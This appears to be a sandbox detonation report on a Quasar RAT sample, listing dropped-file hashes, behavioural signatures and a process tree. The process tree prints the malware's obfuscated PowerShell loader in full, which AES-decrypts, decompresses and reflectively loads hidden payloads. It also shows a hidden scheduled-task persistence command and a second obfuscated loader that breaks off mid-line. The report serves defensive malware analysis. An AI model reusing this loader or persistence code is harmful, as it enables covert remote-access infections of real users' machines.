memory/3244-48-0x0000000006EC0000-0x0000000006EDE000-memory.dmp
memory/3244-51-0x0000000007CC0000-0x0000000007CCA000-memory.dmp
memory/3244-52-0x0000000007ED0000-0x0000000007F66000-memory.dmp
memory/3244-53-0x0000000007E60000-0x0000000007E71000-memory.dmp
memory/3244-54-0x0000000075030000-0x00000000757E1000-memory.dmp
memory/3244-57-0x0000000075030000-0x00000000757E1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 5dc9a9599fb11ee70f9164d8fea15abf |
| SHA1 | 85faf41a206f3fa8b469609333558cf817df2cda |
| SHA256 | 3f033142ed64a5d1e1e19d11a710e22a32827e98922769497ed6bd6e452e44de |
| SHA512 | 499407006c53a5f8e5b2b00dab734613762e66a9080504ab50d21e4c8a32b75d7308ccaa0cecfbeb7058044448a40912715da1f02ec72994596d567b515dcfca |
C:\Users\Admin\AppData\Roaming\Windows_Log_746.vbs
| MD5 | 83f86558cd4f137ae64a4e6c382c09e3 |
| SHA1 | 325c8f6ef68cb33fa909819d8d5c05184c6f809b |
| SHA256 | 64cc98f0c50cc3861c0f7f6c0e19a35c8862d0b7ba9a7187d1c9b91a3dbac676 |
| SHA512 | 04ee5d79f4279fe1e2d621b121e8ce3c141d7b7315cfa454410bc51588f620282be5b1a2c4bfad5c71b5555325817ba8e8d8ec24e9d8006faff768419d56f23d |
C:\Users\Admin\AppData\Roaming\Windows_Log_746.bat
| MD5 | d4c582bb5890af020c110f2b1de1d9db |
| SHA1 | 04c25b115c7bdaced94746c4acf9b5245f064ea0 |
| SHA256 | d34225f65c10acac82f381cf0f4281b2bc691afb2b72a1331acee94ca10e5c1c |
| SHA512 | 4b104fd0f62ecab38cc02b4cd77e6b8b5bcaaa3d98ad48f537fc7a67aa7d72d4575026921b63c9a743a41faaf3dd3154717bd6690f87dcb4114da05106b93012 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 3cb6c07e577fcdc8b90fdcd0e16ac355 |
| SHA1 | c53b0a797b2e606c7233bc5a4084cd95b218d615 |
| SHA256 | b8a2cf4223cb872b41b28c245b03764e62eebc0bc9e41fb8c71c032b9b569584 |
| SHA512 | 3ab2121c0b87d35d13e8a7a0f2479f44f623fd0d3693c941c70937c4e85a1cd798d77922e370e6ee38c55d71eb18ca70b25c758523b5019dc0e500b771881c48 |
memory/4396-74-0x0000000075030000-0x00000000757E1000-memory.dmp
memory/4712-78-0x000000000A9A0000-0x000000000AA32000-memory.dmp
memory/4712-77-0x0000000008060000-0x00000000080BE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Install.exe
| MD5 | b489b7d9efc807fb9583f21f39327fc2 |
| SHA1 | 1ee42e6c08cd0a51d5c763c6b8771c004b962865 |
| SHA256 | 6f1bc33cba78e569e98566aa17be4a548c9ed1a6ea0f35a2149ad504def56579 |
| SHA512 | 53be2dc3574e1da8c643b24e6b982a19f6f2f4748acc38d5c625f66e701c1b4124156983c29668c8bed4c79b5f27d0f932c8a38ebecb33170c283f1161068c2e |
memory/4712-86-0x0000000005810000-0x0000000005822000-memory.dmp
memory/3304-89-0x0000014946AA0000-0x0000014946AC2000-memory.dmp
memory/3304-96-0x0000014946E50000-0x0000014946E7A000-memory.dmp
memory/3304-98-0x00007FF9B0ED0000-0x00007FF9B0F8D000-memory.dmp
memory/4004-99-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3304-97-0x00007FF9B2A40000-0x00007FF9B2C49000-memory.dmp
memory/4004-104-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4004-102-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4004-101-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4004-100-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4004-107-0x00007FF9B2A40000-0x00007FF9B2C49000-memory.dmp
memory/4004-108-0x00007FF9B0ED0000-0x00007FF9B0F8D000-memory.dmp
memory/636-113-0x0000026765CF0000-0x0000026765D1A000-memory.dmp
memory/636-120-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/688-130-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/688-129-0x000001DF53480000-0x000001DF534AA000-memory.dmp
memory/992-140-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/432-150-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/708-160-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/708-159-0x00000246B7540000-0x00000246B756A000-memory.dmp
memory/708-154-0x00000246B7540000-0x00000246B756A000-memory.dmp
memory/432-149-0x000002B8A7360000-0x000002B8A738A000-memory.dmp
memory/432-144-0x000002B8A7360000-0x000002B8A738A000-memory.dmp
memory/992-139-0x000001E927C60000-0x000001E927C8A000-memory.dmp
memory/992-134-0x000001E927C60000-0x000001E927C8A000-memory.dmp
memory/688-124-0x000001DF53480000-0x000001DF534AA000-memory.dmp
memory/636-119-0x0000026765CF0000-0x0000026765D1A000-memory.dmp
memory/636-114-0x0000026765CF0000-0x0000026765D1A000-memory.dmp
memory/636-112-0x0000026765CC0000-0x0000026765CE5000-memory.dmp
memory/4004-109-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4712-726-0x00000000082F0000-0x00000000082FA000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-11 17:41
Reported
2024-06-11 17:42
Platform
win10-20240404-en
Max time kernel
54s
Max time network
46s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3752 created 568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3752 set thread context of 208 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\sihost.exe
sihost.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, $param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_605_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_605.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_605.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_605.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, $param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Roaming\Windows_Log_605.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ogzDqwWhdUBf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lJwFyNKTsaMIHN,[Parameter(Position=1)][Type]$oMmkqHfKTl)$IBqrmOULbXN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+'e'+'c'+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'y'+'D'+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+'e'+'',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+',A'+'u'+'to'+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$IBqrmOULbXN.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+'N'+'a'+''+[Char](109)+''+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$lJwFyNKTsaMIHN).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+'g'+[Char](101)+'d');$IBqrmOULbXN.DefineMethod('I'+'n'+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''